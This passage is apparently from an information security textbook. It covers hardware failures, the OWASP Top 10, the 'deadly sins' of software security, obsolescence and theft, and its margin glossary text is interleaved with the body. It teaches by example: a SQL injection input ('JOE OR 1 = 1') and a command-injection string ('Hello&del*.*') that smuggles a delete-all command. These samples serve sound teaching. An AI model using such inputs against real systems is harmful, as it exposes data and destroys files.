selves periodically, resulting in faults that are not easily repeated. Thus, equipment
can sometimes stop working or work in unexpected ways. Murphy’s law (yes, there
session hijacking really was a Murphy) holds that if something can possibly go wrong, it will.63 In other
See TCP hijacking. words, it’s not a question if something will fail, but when.
2) Hacker intercepts transmission, and

poses as Company B. Hacker exchanges
his own keys with Company A. Hacker
then establishes a session with
Company B, posing as Company A.
1) Company A attempts
to establish an encrypted
session with Company B.
3) Company B sends all messages to the hacker who

receives, decrypts, copies, and forwards copies (possibly
modified) to Company A.
Figure 2-18 Man-in-the-middle attack

The Intel Pentium CPU Failure

One of the best-known hardware failures is that of the Intel Pentium II
chip (similar to the one shown in Figure 2-19), which had a defect that
resulted in a calculation error under certain circumstances. Intel initially
expressed little concern for the defect and stated that it would take an
inordinate amount of time to identify a calculation that would interfere
with the reliability of results. Yet, within days after the chip’s defect
was announced, popular computing journals were publishing a simple
calculation (the division of 4,195,835 by 3,145,727 within a spreadsheet)
that determined whether a machine contained the defective chip and
thus the floating-point operation bug. The Pentium floating-point divi-
sion bug (FDIV) led to a public-relations disaster for Intel that resulted
in its first-ever chip recall and a loss of more than $475 million. A few
months later, disclosure of another bug, known as the Dan-0411 flag
erratum, further eroded the chip manufacturer’s public image.64 In 1998, Figure 2-19 Intel chip
Intel released its Xeon chip and discovered it also had hardware errors.
Intel said, “All new chips have bugs, and the process of debugging and improving performance inevitably continues
even after a product is in the market.”65
Mean Time Between Failure

In hardware terms, failures are measured in mean time between failure (MTBF) and mean time to failure (MTTF).
While MTBF and MTTF are sometimes used interchangeably, MTBF presumes that the item can be repaired or returned
to service, whereas MTTF presumes the item must be replaced. From a repair standpoint, MTBF = MTTF + MTTD + MTTR,
where MTTD examines mean time to diagnose and MTTR calculates mean time to repair. The most commonly failing
piece of computer hardware is the hard drive, which currently has an average MTBF
of approximately 500,000 hours. Hard drive vendors report they are converting from mean time between
MTBF for hard drives to a new measure, annualized failure rate, which is based on failure (MTBF)
the manufacturer’s product and warranty data. So, instead of a 500,000 hour MTBF, you The average amount of time between
hardware failures, calculated as the
could have an AFR of 0.5 percent.
total amount of operation time for a
specified number of units divided by
Technical Software Failures or Errors the total number of failures.
Large quantities of computer code are written, debugged, published, and sold before all mean time to failure
their bugs are detected and resolved. Sometimes, combinations of certain software and (MTTF)
hardware reveal new failures that range from bugs to untested failure conditions. Some- The average amount of time until
times these bugs are not errors but purposeful shortcuts left by programmers for benign the next hardware failure.
or malign reasons. Collectively, shortcut access routes into programs that bypass secu-
rity checks are called trap doors, and they can cause serious security breaches. mean time to diagnose
Software bugs are so commonplace that entire Web sites are dedicated to docu- (MTTD)
menting them. Among the most popular is Bugtraq, found at www.securityfocus.com, The average amount of time a
computer repair technician needs
which provides up-to-the-minute information on the latest security vulnerabilities as to determine the cause of a failure.
well as a thorough archive of past bugs.
The OWASP Top 10 mean time to repair

(MTTR)
The Open Web Application Security Project (OWASP) was founded in 2001 as a non-
The average amount of time a com-
profit consortium dedicated to helping organizations create and operate software puter repair technician needs to
applications they could trust. Every three years or so, OWASP publishes a list of resolve the cause of a failure through
“Top 10 Web Application Security Risks” along with an OWASP Developer’s Guide. replacement or repair of a faulty unit.
The current OWASP Top 10 consists of the following:

annualized failure rate
1. Injection (AFR)
2. Broken authentication
The probability of a failure of hard-
3. Sensitive data exposure ware based on the manufacturer’s
4. XML external entities (XXE) data of failures per year.
5. Broken access control

6. Security misconfiguration
7. Cross-site scripting (XSS)
8. Insecure deserialization
9. Insufficient logging & monitoring
10. Insecure direct object references66
This list is virtually unchanged since 2010. Many of these items are described in detail in the following section.
i For more information on the top 10 software vulnerabilities or the OWASP project, visit www.owasp.org.
The Deadly Sins in Software Security

Some software development failures and errors result in software that is difficult or impossible to deploy in a secure
fashion. The most common of these failures have been identified as “deadly sins in software security.”67 These problem
areas in software development were originally categorized by John Viega, upon request of Amit Youran, who at the time
was the director of the Department of Homeland Security’s National Cyber Security Division. These problem areas are
described in the following sections. The first four “sins” are focused on Web applications.
SQL Injection SQL injection occurs when developers fail to properly validate user input before using it to query a
relational database. For example, a fairly innocuous program fragment might expect the user to input a user ID and
then perform a SQL query against the USERS table to retrieve the associated name:
Accept USER-ID from console;
SELECT USERID, NAME FROM USERS WHERE USERID = USER-ID;
This is very straightforward SQL syntax; when used correctly, it displays the user ID and name. The problem is that
the string accepted from the user is passed directly to the SQL database server as part of the SQL command. What if an
attacker enters the string “JOE OR 1 = 1”? This string includes some valid SQL syntax that will return all rows from the
table where the user ID is either “JOE” or “1 = 1.” Because one is always equal to one, the system returns all user IDs and
names. The possible effects of the hacker’s “injection” of SQL code into the program are not limited to improper access
to information—what if the attacker included SQL commands to drop the USERS table or even shut down the database?
Web Server-Related Vulnerabilities (XSS, XSRF, and Response Splitting) One of the issues in programming Web-
based applications is bugs that affect either the client side or the server side. Server-side cross-site scripting involves intro-
ducing security bugs that infect clients that connect to the site. Cross-site scripting allows the attacker to acquire valuable
information, such as account credentials, account numbers, or other critical data. Often an attacker encodes a malicious
link and places it in the target server, making it look less suspicious. After the data is collected by the hostile application,
it sends what appears to be a valid response from the intended server. Cross-site request forgery (XSRF or CSRF) attacks
cause users to attack servers they access legitimately, on behalf of an outside attacker. For example, on banking Web sites,
this could include changing a fund transfer account number to the attacker’s account number. HTTP response splitting
involves the unvalidated redirection of data into a Web-based application from an unvalidated source, such as an HTTP
request, or as part of an HTTP response header, and possibly contains malicious characters that have not been checked for.
Web Client-Related Vulnerability (XSS) The same cross-site scripting attacks that can infect a server can also be
used to attack Web clients. Client-side cross-site scripting errors can cause problems that allow an attacker to send
malicious code to the user’s computer by inserting the script into an otherwise normal Web site. The user’s Web
browser, not knowing the code is malicious, runs it and inadvertently infects the
client system. Some code can read a user’s Web information, such as his or her Web
cross-site scripting history, stored cookies or session tokens, or even stored passwords.
(XSS)
A Web application fault that occurs Use of Magic URLs and Hidden Forms HTTP is a stateless protocol in which com-
when an application running on puter programs on either end of the communication channel cannot rely on a guaran-
a Web server inserts commands
teed delivery of any message. This makes it difficult for software developers to track a
into a user’s browser session and
causes information to be sent to a user’s exchanges with a Web site over multiple interactions. Too often, sensitive state
hostile server. information is included in hidden form fields on the HTML page or simply included
in a “magic” URL. (For example, the authentication ID is passed as a parameter in the buffer overrun
URL for the exchanges that will follow.) If this information is stored as plain text, an An application error that occurs
attacker can harvest the information from a magic URL as it travels across the network when more data is sent to a pro-
gram buffer than it is designed to
or use scripts on the client to modify information in hidden form fields. Depending on
handle.
the structure of the application, the harvested or modified information can be used
in spoofing or hijacking attacks, or to change the way the application operates. For
example, if an item’s price is kept in a hidden form field, the attacker could arrange
integer bug
A class of computational error
to buy that item for one cent.
caused by methods that computers
Buffer Overrun The next set of “sins” is focused on implementation. For example, use to store and manipulate integer
numbers; this bug can be exploited
buffers are used to manage mismatches in the processing rates between two entities by attackers.
involved in a communication process. During a buffer overrun, an attacker can make
the target system execute instructions or take advantage of some other unintended
consequence of the failure. Sometimes this is limited to a DoS attack. In any case, data on the attacked system loses
integrity. In 1998, Microsoft encountered the following buffer overflow problem:
Microsoft acknowledged that if you type a res://URL (a Microsoft-devised type of URL) which is longer
than 256 characters in Internet Explorer 4.0, the browser will crash. No big deal, except that anything
after the 256th character can be executed on the computer. This maneuver, known as a buffer overrun,
is just about the oldest hacker trick in the book. Tack some malicious code (say, an executable version
of the Pentium-crashing FooF code) onto the end of the URL, and you have the makings of a disaster.68
One of the marks of effective software is the ability to catch and resolve exceptions—unusual situations that
require special processing. If the program doesn’t manage exceptions correctly, the software may not perform as
expected. Exceptions differ from errors in that exceptions are considered expected but irregular situations at runtime,
while errors are mistakes in the running program that can be resolved only by fixing the program.
Format String Problems Computer languages often are equipped with built-in capabilities to reformat data while
they output it. The formatting instructions are usually written as a “format string.” Unfortunately, some programmers
may use data from untrusted sources as a format string. An attacker may embed characters that are meaningful as
formatting directives (such as %x, %d, %p, etc.) into malicious input. If this input is then interpreted by the program
as formatting directives (such as an argument to the C printf function), the attacker may be able to access information
or overwrite very targeted portions of the program’s stack with data of the attacker’s choosing.
Integer Bugs (Overflows/Underflows) Although mathematical calculation theoretically can deal with numbers that
contain an arbitrary number of digits, the binary representations used by computers are of a particular fixed length.
The programmer must anticipate the size of the numbers to be calculated in any given part of the program. An integer
bug can result when a programmer does not validate the inputs to a calculation to verify that the integers are of the
expected size. For example, adding 1 to 32,767 should produce 32,768, but in computer arithmetic with 16-bit signed
integers, the erroneous result is –32,768. An underflow can occur, for example, when you subtract 5 from negative
32,767, which returns the incorrect result +32,764, because the largest negative integer that can be represented in 16
bits is negative 32,768.
Integer bugs fall into four broad classes: overflows, underflows, truncations, and signedness errors.
Integer bugs are usually exploited indirectly—that is, triggering an integer bug enables an attacker to
corrupt other areas of memory, gaining control of an application. The memory allocated for a value
could be exceeded, if that value is greater than expected, with the extra bits written into other locations.
The system may then experience unexpected consequences, which could be miscalculations, errors,
crashing, or other problems. Even though integer bugs are often used to build a buffer overflow or
other memory corruption attack, integer bugs are not just a special case of memory corruption bugs.69
C++ Catastrophes C++ is a programming language that has been around since the 1980s. In recent years, issues have
arisen that cause concern from a security perspective. The first of these issues is the compromise of a function pointer,
which is a way to reference executable code in memory. Many operating systems have APIs that use these pointers to
control the execution of code. If these pointers are corrupted, control of the flow of the program can be interrupted
and redirected. The second issue can occur if a C++ class has a virtual method containing a virtual function pointer
table. Overwriting the class allows alteration of the virtual table pointer, which again allows the attacker to take over
the flow of the program.70
Catching Exceptions Exceptions are errors in the execution of a program. How the program handles these errors
can allow the program either to close safely or to continue in an unstable and potentially insecure manner. Attackers
learn about programs that don’t handle errors well and figure out how to intentionally introduce an error, allowing
them to seize control of the application in its post-error state. Learning how to properly manage “try-catch” blocks to
handle exceptions is a critical skill in programming, and even the best programmers run across unexpected conditions
that result in systems problems. This “sin” is closely related to several others that deal with system or program errors.
Command Injection The problem of command injection is caused by a developer’s failure to ensure that com-
mand input is validated before it is used in the program. Perhaps the simplest example can be demonstrated using
the Windows command shell:
@echo off
set /p myVar=”Enter the string>”
set someVar=%myVar%
echo
These commands ask the user to provide a string and then simply set another variable to the value and display
it. However, an attacker could use the command chaining character “&” to append other commands to the string the
user provides (Hello&del*.*).
Failure to Handle Errors What happens when a system or application encounters a scenario that it is not prepared
to handle? Does it attempt to complete the operation (reading or writing data or performing calculations)? Does it
issue a cryptic message that only a programmer could understand, or does it simply stop functioning? Failure to handle
errors can cause a variety of unexpected system behaviors. Programmers are expected to anticipate problems and
prepare their application code to handle them. This category focuses on those errors rather than exceptions, which
were described earlier.
Information Leakage One of the most common methods of obtaining inside and classified information is directly
or indirectly from one person, usually an employee. A famous World War II military poster warned that “loose lips
sink ships,” emphasizing the risk to naval deployments from enemy attack if sailors, Marines, or their families
disclosed the movements of U.S. vessels. A widely shared fear was that the enemy had civilian operatives waiting
in bars and shops at common Navy ports of call, just waiting for the troops to drop hints about where they were
going and when. By warning employees against disclosing information, organizations can protect the secrecy of
their operation.
Race Conditions A race condition is a failure of a program that occurs when an unexpected ordering of events in its
execution results in a conflict over access to a system resource. This conflict does not need to involve streams of code
inside the program because current operating systems and processor technology automatically break a program into
multiple threads that can be executed simultaneously. If the threads that result from this process share any resources,
they may interfere with each other. A race condition occurs, for example, when a program creates a temporary file
and an attacker can replace it between the time it is created and the time it is used. A race condition can also occur
when information is stored in multiple memory threads if one thread stores information in the wrong memory loca-
tion, either by accident or intent.
Poor Usability Employees prefer doing things the easy way. When faced with an “official way” of performing a task
and an “unofficial way”—which is easier—they prefer the latter. The best solution to address this issue is to provide
only one way—the secure way! Integrating security and usability, adding training and
awareness, and ensuring solid controls all contribute to the security of information.
command injection
Allowing users to choose easier solutions by default will inevitably lead to loss.
An application error that occurs
when user input is passed directly Not Updating Easily As developers create applications, they try to catch all of the
to a compiler or interpreter without
errors and bugs in the programs. With the extreme complexity of modern applica-
screening for content that may dis-
rupt or compromise the intended tions, and with the expected dramatic increase in complexity of future applications,
function. it’s not always possible to catch all of the errors before the product needs to go to
market. The current method of handling this issue is to release patches and updates after the product is in the hands
of the consumers. Updates themselves introduce a security risk, as attackers could interrupt and swap out legitimate
updates or patches with malware or their own program alterations. Applications that don’t update cleanly and securely
thus introduce a security risk for the organization. The aspects of change management discussed in later modules in
this book also affect this sin, as the ability to test and roll back changes is critical in case an update or patch results
in unexpected issues.
Executing Code with Too Much Privilege Computers talk to other computers and are users in their own rights.
As users, they must have privileges to access program and data on other computers. When systems are set up with
excessive privileges, they can create security issues. Just like users, systems and applications should only have the
least privilege they need to do the job. Developers may initially assign higher-level privileges in the development of an
application and then may forget to lower those privileges. If attackers can compromise a system with these high-level
privileges, they can use that access to take over other systems. One of the greatest concerns in this area occurs when
individuals download and run code from public sources, like Web sites. Because you didn’t develop the code or pay
a professional vendor for it, you can’t be certain that the code doesn’t contain malicious components like back doors
or data exfiltration components.
Failure to Protect Stored Data Protecting stored data is a large enough issue to be the core subject of this entire
text. Programmers are responsible for integrating access controls into programs and keeping secret information out
of them. Access controls, the subject of later modules, regulate who, what, when, where, and how users and systems
interact with data. Failure to properly implement sufficiently strong access controls makes the data vulnerable. Overly
strict access controls hinder business users in the performance of their duties, and as a result, the controls may be
administratively removed or bypassed. The integration of secret information—such as the “hard coding” of passwords,
encryption keys, or other sensitive information—can put that information at risk of disclosure.
The Sins of Mobile Code In this context, mobile code is an application, applet, macro, or script that may be imbed-
ded in another application or document and thus downloaded and executed without the user even knowing, and
especially without consenting. Office suite tools are notorious for using macros, and third parties could insert mali-
cious content into existing office documents shared by users. Web pages also use mobile code with embedded scripts,
programs, and applets. Java has come under fire lately for its susceptibility to attack, to the point that many programs
won’t use Java. The same approach has been taken with ActiveX and Adobe Flash plug-ins. Mobile code in organiza-
tional applications should be reviewed and tested carefully to ensure that security vulnerabilities from the code don’t
cause problems.
Use of Weak Password-Based Systems The next set of sins involve the use of cryptography. For example, failure
to require sufficient password strength and to control incorrect password entry is a serious security issue. Password
policy can specify the acceptable number and type of characters, the frequency of mandatory changes, and even the
reusability of old passwords. Similarly, a system administrator can regulate the permitted number of incorrect pass-
word entries that are submitted and further improve the level of protection. Systems that do not validate passwords,
or that store passwords in easily accessible locations, are ripe for attack.
Weak Random Numbers Most modern cryptosystems, like many other computer systems, use random number
generators. However, a decision support system that uses random and pseudorandom numbers for Monte Carlo
method forecasting does not require the same degree of rigor and the same need for true randomness as a system
that seeks to implement cryptographic procedures. These “random” number generators use a mathematical algorithm
based on a seed value and another system component (such as the computer clock) to simulate a random number.
Those who understand the workings of such a “random” number generator can predict particular values at particular
times.
Using Cryptography Incorrectly A wide variety of issues fall into this category. Cryptography is a powerful
tool to protect information, especially information that may travel outside the organization’s protective networks
and systems. Using untested or undertested cryptographic algorithms and programs can cause issues. Using weak
crypto keys or reusing the same crypto keys can cause issues, as can sending crypto keys through the same medium
as the encrypted messages. The challenges of using cryptography correctly require the organization to carefully
review and implement its technologies before trusting them to carry its sensitive data.
Failure to Protect Network Traffic The final set of “sins” focuses on issues associated with networking. For exam-
ple, with the growing popularity of wireless networking comes a corresponding increase in the risk that wirelessly
transmitted data will be intercepted. Most wireless networks are installed and operated with little or no protection for
the information that is broadcast between the client and the network wireless access point. This is especially true of
public networks found in coffee shops, bookstores, and hotels. Without appropriate encryption such as that afforded
by WPA, attackers can intercept and view your data. Traffic on a wired network is also vulnerable to interception in
some situations. On networks using hubs instead of switches, any user can install a packet sniffer and collect com-
munications to and from users on that network. Periodic scans for unauthorized packet sniffers and unauthorized
connections to the network, as well as general awareness of the threat, can mitigate this problem.
Improper Use of PKI, Especially SSL Public key infrastructure (PKI), described in Module 10, is currently the gold
standard for securing network communications. One of the biggest challenges in PKI is certificate management. There
is a great deal of “trust” associated with the use of PKI, and a lot of that trust is manifested in certificates that must
be properly passed around between systems, like an ID card, so that access can be granted. The mishandling of PKI
certificates can cause issues, including improper validation of credentials. As a result, a person or system that should
get access doesn’t, and a person or system that shouldn’t have access may get it. Many programs in PKI also revolve
around the use of Secure Sockets Layer (SSL), which programmers use to transfer sensitive data, such as credit card
numbers and other personal information, between a client and server. While most programmers assume that using SSL
guarantees security, they often mishandle this technology. SSL and its successor, Transport Layer Security (TLS), both
need certificate validation to be truly secure. Failure to use Hypertext Transfer Protocol Secure (HTTPS) to validate
the certificate authority and then the certificate itself, or failure to validate the information against a certificate revo-
cation list (CRL), can compromise the security of SSL traffic. You will learn much more about cryptographic controls
in Module 10.
Trusting Network Name Resolution The DNS is a function of the World Wide Web that converts a URL like www
.cengage.com into the IP address of the Web server host. This distributed model is vulnerable to attack or “poisoning.”
DNS cache poisoning involves compromising a DNS server and then changing the valid IP address associated with a
domain name into one the attacker chooses, usually a fake Web site designed to obtain personal information or one
that accrues a benefit to the attacker—for example, redirecting shoppers from a competitor’s Web site. Such attacks
are usually more sinister, however; for instance, a simulated banking site used for a phishing attack might harvest
online banking information.
How does someone get this fake information into the DNS server? Aside from a direct attack against a root DNS
server, most attempts are made against primary and secondary DNS servers, which are local to an organization and
part of the distributed DNS system. Other attacks attempt to compromise the DNS servers further up the DNS distribu-
tion mode—those of ISPs or backbone connectivity providers. The DNS relies on a process of automated updates that
can be exploited. Attackers most commonly compromise segments of the DNS by attacking the name of the name server
and substituting their own DNS primary name server, by incorrectly updating an individual record, or by responding
before an actual DNS can. In the last type of attack, the attacker tries to discover a delay in a name server or to intro-
duce a delay, as in a DoS attack. When the delay is in place, the attacker can set up another server to respond as if it
were the actual DNS server, before the real DNS server can respond. The client accepts the first set of information it
receives and is directed to that IP address.
Neglecting Change Control One of the topics associated with an earlier version of “deadly sins” that has fallen off
the newer list is more of a managerial topic, and is worthy of discussion. Developers use a process known as change
control to ensure that the working system delivered to users represents the intent of the developers. Early in the
development process, change control ensures that developers do not work at cross purposes by altering the same
programs or parts of programs at the same time. Once the system is in production, change control processes ensure
that only authorized changes are introduced and that all changes are adequately tested before being released.
Technological Obsolescence
Antiquated or outdated infrastructure can lead to unreliable and untrustworthy systems. Management must recognize
that when technology becomes outdated, there is a risk of losing data integrity from attacks. Management’s strategic
planning should always include an analysis of the technology currently in use. Ideally, proper planning by management
should prevent technology from becoming obsolete, but when obsolescence is clear, management must take immediate
action. IT professionals play a large role in the identification of probable obsolescence.
Recently, the software vendor Symantec retired support for a legacy version of its popular antivirus software,
and organizations that wanted continued product support were obliged to upgrade immediately to a different version
of antivirus software. In organizations where IT personnel had kept management informed of the coming retirement,
these replacements were made more promptly and at lower cost than in organizations where the software had become
obsolete.
Perhaps the most significant case of technology obsolescence in recent years is Microsoft’s Windows XP.
This desktop operating system was dominant in the market for many years, beginning in 2001. The OS evolved
over time to be used in multiple variations such as XP Pro and XP Home, it had feature and capability upgrades
in three service packs, and it even made the transition to new processors with a 64-bit edition. It was superseded
in the corporation’s lineup of desktop operating systems by Microsoft Vista in January 2007. However, it retained
a large following of users and remained in widespread use for many years. Microsoft discontinued support for
Windows XP in April 2014. Many industries and organizations built critical elements of their business systems and
even their infrastructure control systems on top of Windows XP, or they used it as an embedded operating system
inside other systems, such as automated teller machines and power generating and control systems. Similar issues
seem to follow other Windows variants, as users get comfortable with a particular OS and then seem reluctant to
upgrade to a newer version.
Figure 2-20 shows other examples of obsolete technology, including removable storage media in 8-inch, 5-inch, and
3.5-inch formats as well as open-reel magnetic tape.
Theft
The threat of theft is a constant. The value of information is diminished when it is copied without the owner’s knowl-
edge. Physical theft can be controlled easily using a wide variety of measures, from locked doors to trained security
personnel and the installation of alarm systems. Electronic theft, however, is a more complex problem to manage and
control. When someone steals a physical object, the loss is easily detected; if it has any importance at all, its absence
is noted. When electronic information is stolen, the crime is not always readily apparent. If thieves are clever and cover
their tracks carefully, the crime may remain undiscovered until it is too late.
Theft is often an overlapping category with software attacks, espionage or trespass, information extortion,
and compromises to intellectual property. A hacker or other individual threat agent could access a system and
commit most of these offenses by downloading a company’s information and then threatening to publish it if
not paid.
The increasing use of mobile technology, including smartphones, tablet PCs, and
laptops, increases the risk of data theft. More disconcerting than the loss of data is theft
the chance that the user has allowed the mobile device to retain account credentials, The illegal taking of another’s prop-
allowing the thief to use legitimate access to get into business or personal accounts erty, which can be physical, elec-
that belong to the victim. tronic, or intellectual.
Figure 2-20 Obsolete technologies

Closing Scenario
Shortly after the SLS Board of Directors meeting, Charlie was named chief information security officer to fill a new leadership
position created to report to the CIO, Gladys Williams. The primary role of the new position is to provide leadership for SLS’s
efforts to improve its information security profile.
Discussion Questions
1. Before the discussion at the start of this module, how did Fred, Gladys, and Charlie each perceive the scope and
scale of the new information security effort? Did Fred’s perception change after the discussion?
2. How should Fred measure success when he evaluates Gladys’ performance for this project? How should he
evaluate Charlie’s performance?
3. Which of the threats discussed in this module should receive Charlie’s attention early in his planning process?
Ethical Decision Making

1. Suppose Charlie has made great progress in planning to improve the security program at the company. After
many weeks of planning and careful implementation, a formal plan is ready for presentation to the Board of
Directors. Gladys asks Charlie to prepare a written report and a presentation for Gladys to give to the Board.
Gladys edits the presentation to make it seem that she prepared the work herself with Fred’s assistance, but
without any mention of Charlie’s contributions. Is Gladys acting ethically? What may be some consequences of
her actions?
2. Suppose that SLS has implemented the policy prohibiting use of personal USB drives at work. Also, suppose
that Davey Martinez brought in the USB drive he had used to store last month’s accounting worksheet. When he
plugged in the drive, the worm outbreak started again and infected two servers. When Charlie finds out about
this violation of policy, he confronts Davey and gives him a verbal dressing down that includes profanity and
threats. Is Charlie acting ethically?
Selected Readings
• The journal article “Enemy at the Gates: Threats to Information Security,” by Michael Whitman, was published in
Communications of the ACM in August 2003, on pages 91–96. An abstract is available from the ACM Digital Library at
www.acm.org. Journal access may be available through your local library.
• The Art of War by Sun Tzu. Many translations and editions are widely available, both print and online.
• 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them, by M. Howard, D. LeBlanc, and J. Viega, is
published by McGraw-Hill/Osborne Publishing.
Module Summary
Information security performs four important functions to ensure that information assets remain safe and use-
ful: protecting the organization’s ability to function, enabling the safe operation of applications implemented
on the organization’s IT systems, protecting the data an organization collects and uses, and safeguarding the
organization’s technology assets.
To make sound decisions about information security, management must be informed about threats to its
people, applications, data, and information systems, and the attacks they face.
Threats are any events or circumstances that have the potential to adversely affect operations and assets. An
attack is an intentional or unintentional act that can damage or otherwise compromise information and the
systems that support it. A vulnerability is a potential weakness in an asset or its defensive controls.
Threats or dangers facing an organization’s people, information, and systems fall into the following categories:
❍ Compromises to intellectual property—Intellectual property, such as trade secrets, copyrights, trademarks,
or patents, are intangible assets that may be attacked via software piracy or the exploitation of asset protec-
tion controls.
❍ Deviations in quality of service—Organizations rely on services provided by others. Losses can come from
interruptions to those services.

❍ Espionage or trespass—Asset losses may result when electronic and human activities breach the confidenti-
ality of information.
❍ Forces of nature—A wide range of natural events can overwhelm control systems and preparations to cause
losses to data and availability.

❍ Human error or failure—Losses to assets may come from intentional or accidental actions by people inside
and outside the organization.

❍ Information extortion—Stolen or inactivated assets may be held hostage to extract payment of ransom.
❍ Sabotage or vandalism—Losses may result from the deliberate sabotage of a computer system or business,
or from acts of vandalism. These acts can either destroy an asset or damage the image of an organization.
❍ Software attacks—Losses may result when attackers use software to gain unauthorized access to systems or
cause disruptions in systems availability.

❍ Technical hardware failures or errors—Technical defects in hardware systems can cause unexpected results,
including unreliable service or lack of availability.

❍ Technical software failures or errors—Software used by systems may have purposeful or unintentional errors
that result in failures, which can lead to loss of availability or unauthorized access to information.
❍ Technological obsolescence—Antiquated or outdated infrastructure can lead to unreliable and untrust-
worthy systems that may result in loss of availability or unauthorized access to information.
❍ Theft—Theft of information can result from a wide variety of attacks.
Review Questions
1. Why is information security a management prob- 8. How has the perception of the hacker changed over
lem? What can management do that technology recent years? What is the profile of a hacker today?
cannot? 9. What is the difference between a skilled hacker and
2. Why is data the most important asset an organiza- an unskilled hacker, other than skill levels? How
tion possesses? What other assets in the organiza- does the protection against each differ?
tion require protection? 10. What are the various types of malware? How do
3. Which management groups are responsible for worms differ from viruses? Do Trojan horses carry
implementing information security to protect the viruses or worms?
organization’s ability to function? 11. Why does polymorphism cause greater concern
4. Has the implementation of networking technology, than traditional malware? How does it affect
such as the cloud, created more or less risk for detection?
businesses that use information technology? Why? 12. What is the most common violation of intellectual
5. What is information extortion? Describe how such property? How does an organization protect against
an attack can cause losses, using an example not it? What agencies fight it?
found in the text. 13. What are the various forces of nature? Which type
6. Why are employees among the greatest threats to might be of greatest concern to an organization in
information security? Las Vegas? Jakarta? Oklahoma City? Amsterdam?
7. How can you protect against shoulder surfing? Miami? Tokyo?
14. How is technological obsolescence a threat to infor- 18. For a sniffer attack to succeed, what must the
mation security? How can an organization protect attacker do? How can an attacker gain access to a
against it? network to use the sniffer system?
15. Does the intellectual property owned by an organi- 19. What methods would a social engineering
zation usually have value? If so, how can attackers hacker use to gain information about a user’s
threaten that value? login ID and password? How would these meth-
16. What are the types of password attacks? What can a ods differ depending on the user’s position in
systems administrator do to protect against them? the company?
17. What is the difference between a denial-of-service 20. What is a buffer overflow, and how is it used
attack and a distributed denial-of-service attack? against a Web server?
Which is more dangerous? Why?
Exercises
1. Consider that an individual threat agent, like a hacker, can be a factor in more than one threat category. If a
hacker breaks into a network, copies a few files, defaces a Web page, and steals credit card numbers, how many
different threat categories does the attack fall into?
2. Using the Web, research Mafiaboy’s exploits. When and how did he compromise sites? How was he caught?
3. Search the Web for “The Official Phreaker’s Manual.” What information in this manual might help a security
administrator to protect a communications system?
4. This module discussed many threats and vulnerabilities to information security. Using the Web, find at least two
other sources of information about threats and vulnerabilities. Begin with www.securityfocus.com and use a key-
word search on “threats.”
5. Using the categories of threats mentioned in this module and the various attacks described, review several cur-
rent media sources and identify examples of each threat.
References
1. Wood, Charles C. Information Security Policies Made Easy. 10th Edition. InformationShield. 2008.
2. Sun-Tzu Wu. “Sun Tzu’s The Art of War.” Translation by the Sonshi Group. Accessed May 31, 2016, from
www.sonshi.com/sun-tzu-art-of-war-translation-original.html.
3. Internet World Stats. “Internet Usage Statistics: The Internet Big Picture, World Internet Users and Popula-
tion Stats.” Accessed July 14, 2020, from www.internetworldstats.com/stats.htm.
4. Whitman, M., and Mattord, H. 2015 SEC/CISE Threats to Information Protection Report. Security Executive
Council. www.securityexecutivecouncil.com.
5. Ibid.
6. Ibid.
7. Ibid.
8. Whitman, M., and Mattord, H. “Threats to Information Security Revisited.” Journal of Information Systems
Security 8, no. 1 (2012): 21, 41. www.jissec.org/.
9. Business Software Alliance. “Software Management: Security Imperative, Business Opportunity.”
2018. Accessed July 14, 2020, from https://gss.bsa.org/wp-content/uploads/2018/05/2018_BSA_GSS_Report_en.pdf.
10. Microsoft. “Microsoft License Terms.” Accessed August 10, 2020, from www.microsoft.com/en-us/useterms.
11. Patton, Natalie. “Bootlegged Software Could Cost Community College.” Las Vegas Review Journal Online.
September 18, 1997. Accessed May 24, 2016, from http://nl.newsbank.com/nl-search/we/Archives?.
12. Fusion Connect. “Infographic: The Cost of Downtime.” Accessed August 12, 2020, from www.fusionconnect.
com/blog/blog-archive/infographic-the-cost-of-downtime/?megapath.
13. Chowdhry, Pankaj. “The Gibraltar Hack: Anatomy of a Break-in.” PCWeek 16, no. 41 (1999): 1, 22.
14. Ibid.
15. Rosencrance, Linda. “Teen Hacker ‘Mafiaboy’ Sentenced.” ComputerWorld Online. Accessed May 24, 2016,
from www.computerworld.com/article/2583318/security0/teen-hacker-mafiaboy-sentenced.html.
16. Kaspersky. “Top 10 Most Notorious Hackers of All Time.” Accessed August 10, 2020, from www.kaspersky.
com/resource-center/threats/top-ten-greatest-hackers.
17. Ibid.
18. Mitnick, K., and Simon, W. The Art of Deception: Controlling the Human Element of Security. Wiley Publish-
ing, Inc., Indianapolis, 2002.
19. “Edward Snowden: A Timeline.” NBC News. Accessed May 23, 2016, from www.nbcnews.com/feature/
edward-snowden-interview/edward-snowden-timeline-n114871.
20. Goldman, David. “Jailbreaking iPhone Apps is Now Legal.” CNN Money. July 26, 2010. Accessed August 10,
2020, from http://money.cnn.com/2010/07/26/technology/iphone_jailbreaking/.
21. Hackthissite.org. Accessed August 10, 2020, from www.hackthissite.org/.
22. Webopedia. “Static Electricity and Computers.” Accessed August 10, 2020, from www.webopedia.com/
DidYouKnow/Computer_Science/static.asp.
23. Del Rey, Jason. “Amazon’s Massive AWS Outage Was Caused by Human Error.” Vox. Accessed August 11, 2020,
from www.vox.com/2017/3/2/14792636/amazon-aws-internet-outage-cause-human-error-incorrect-command.
24. Kennedy, James T. “Internet Intricacies: Don’t Get Caught in the Net.” Contingency Planning & Management
3, no. 1: 12.
25. Abreu, Elinor. “Hacker Kevin Mitnick speaks out.” CNN. Accessed August 10, 2020, from www.cnn.
com/2000/TECH/computing/09/29/open.mitnick.idg/.
26. FBI Internet Crime Complaint Center. “2019 Internet Crime Report.” Accessed August 11, 2020, from
https://pdf.ic3.gov/2019_IC3Report.pdf.
27. The 419 Coalition. Accessed August 11, 2020, from https://419coalition.org/.
28. CERT Advisory CA-1991-03. “Unauthorized Password Change Requests Via Email Messages.” Accessed
August 10, 2020, from https://resources.sei.cmu.edu/asset_files/WhitePaper/1991_019_001_496244.pdf.
29. “Rebuffed Internet Extortionist Posts Stolen Credit Card Data.” CNN Online. January 10, 2000.
30. Lewis, Truman. “Express Scripts Extortion Scheme Widens.” Consumer Affairs. September 30, 2009.
Accessed August 10, 2020, from www.consumeraffairs.com/news/index/2009/09/.
31. Gendar, Alison. “Anthony Digati arrested for allegedly threatening New York Life with email spam
attack.” March 8, 2010. Accessed August 10, 2020, from www.nydailynews.com/news/money/
